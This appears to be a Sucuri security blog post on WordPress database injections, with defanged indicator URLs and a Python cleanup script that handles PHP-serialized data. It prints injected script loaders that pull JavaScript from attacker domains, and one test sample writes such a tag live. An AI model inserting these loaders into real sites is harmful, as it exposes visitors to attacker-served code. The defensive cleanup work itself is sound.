Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data


Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or abandoned copies of the InterconnectIT Search and Replace script (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>

Or:

var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);


The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (185.82.217.166, Bulgaria)
  • java.sometimesfree[.]biz/counter.js (185.82.217.166, Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (185.82.217.166, Bulgaria)
  • js.givemealetter[.]biz/script.js (185.82.217.166, Bulgaria)
  • go.givemealetter[.]biz/click.html (185.82.217.166, Bulgaria)
  • traffictrade[.]life/scripts.js (200.7.105.43, United Kingdom)
  • blue.traffictrade[.]life/main.js (200.7.105.43, United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (94.156.144.19, Bulgaria)
  • get.simplefunsite[.]info/rw.js (did not resolve at the time of writing)
  • post.simplefunsite[.]info/go.php?rewrite=81 (did not resolve at the time of writing)
  • src.dancewithme[.]biz/src.js (185.159.82.2, Russia)
  • go.dancewithme[.]biz/red.php (185.159.82.2, Russia)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on August 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite[.]info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected immediately before <a href tags in the post content (the wp_posts table), so a webmaster may have to remove multiple injected scripts from hundreds of posts in the database: definitely not a task you want to do manually!
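The title's "pitfalls of cleaning serialized data" is the part that bites when you automate this. Post content is plain HTML, but WordPress also stores PHP-serialized values (widget text, theme and plugin options in wp_options, some wp_postmeta rows), and a serialized string carries its own byte length: s:143:"...". A blind search-and-replace that shortens the string leaves the old length behind, PHP's unserialize() then fails on that row, and the option silently reverts to its default. The example below is an added illustration, not code from the Sucuri post: the host list is taken from the URL list above, while the regexes, the minimal PHP (un)serializer and the "looks serialized" heuristic are my own assumptions. It cleans a plain post body directly, parses and re-serializes a serialized cell so every s:N is recomputed, and exposes naive_replace_is_safe() to show the breakage a raw replace causes.

```python
import re

# Campaign hosts from the URL list above; the matching logic is an addition, not Sucuri's.
MALICIOUS_HOSTS = (
    "sometimesfree.biz", "givemealetter.biz", "traffictrade.life",
    "trysomethingnew.eu", "simplefunsite.info", "dancewithme.biz",
)
HOST_RE = re.compile("|".join(re.escape(h) for h in MALICIOUS_HOSTS), re.IGNORECASE)
# Any <script> element, whether it carries a src attribute or an inline loader.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def strip_injected_scripts(html: str) -> str:
    """Drop every <script> element that references a campaign host; keep the rest."""
    return SCRIPT_RE.sub(lambda m: "" if HOST_RE.search(m.group(0)) else m.group(0), html)


def php_unserialize(data: bytes, pos: int = 0):
    """Minimal PHP unserialize for N, b, i, d, s and a (objects are rejected).
    Returns (value, offset just past the value); raises ValueError on corruption."""
    tag = data[pos:pos + 1]
    if tag == b"N":
        return None, pos + 2
    if tag in (b"i", b"d", b"b"):
        end = data.index(b";", pos)
        raw = data[pos + 2:end]
        return (int(raw) if tag == b"i" else float(raw) if tag == b"d" else raw == b"1"), end + 1
    if tag == b"s":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])   # declared length is in BYTES, not characters
        start = colon + 2                   # skip the :"
        end = start + length
        if data[end:end + 2] != b'";':
            raise ValueError(f"s:{length} at offset {pos} does not match the payload")
        return data[start:end].decode("utf-8"), end + 2
    if tag == b"a":
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                     # skip the :{
        items = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            items[key], pos = php_unserialize(data, pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError(f"unterminated array at offset {pos}")
        return items, pos + 1
    raise ValueError(f"unsupported or corrupt token {tag!r} at offset {pos}")


def php_serialize(value) -> bytes:
    """PHP serialize for the same subset; every s:N is recomputed from the UTF-8 bytes."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):             # checked before int: bool subclasses int
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")


def clean_tree(value):
    """Apply the cleaner to every string inside a parsed value, recursing into arrays."""
    if isinstance(value, str):
        return strip_injected_scripts(value)
    if isinstance(value, dict):
        return {k: clean_tree(v) for k, v in value.items()}
    return value


# Heuristic (an assumption, not a WordPress API): the cell starts like a PHP serialized value.
SERIALIZED_RE = re.compile(rb"^(?:[ais]:\d+:|[bid]:[^;]+;|N;)")


def clean_cell(cell: str) -> str:
    """Clean one database cell. Plain HTML (typical wp_posts.post_content) is regex-cleaned
    directly; a serialized cell is parsed, cleaned string by string and re-serialized."""
    raw = cell.encode("utf-8")
    if not SERIALIZED_RE.match(raw):
        return strip_injected_scripts(cell)
    value, end = php_unserialize(raw)
    if end != len(raw):
        raise ValueError("trailing bytes after the serialized value")
    return php_serialize(clean_tree(value)).decode("utf-8")


def naive_replace_is_safe(cell: str) -> bool:
    """The pitfall in one call: search-and-replace the raw cell, then ask whether PHP
    could still unserialize it. False means a stale s:N length was left behind."""
    try:
        php_unserialize(strip_injected_scripts(cell).encode("utf-8"))
        return True
    except ValueError:
        return False


# Constructed samples (not real site data): the injection sits right before an <a href>.
INJECTED = "<script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script>"
POST = f'<p>Read more {INJECTED}<a href="https://example.com/post">here</a>.</p>'
WIDGET = php_serialize({"title": "Links", "text": POST, "filter": False}).decode("utf-8")
```

In practice you would SELECT the affected rows from wp_posts, wp_postmeta and wp_options, run each cell through clean_cell(), and UPDATE only the rows that changed, with a database backup taken first. The parser deliberately refuses O: objects rather than guessing at them; WP-CLI's wp search-replace is the standard tool that handles serialized lengths for you, which is the safer route when the cleanup is a fixed string replacement rather than a pattern-based one.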

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.
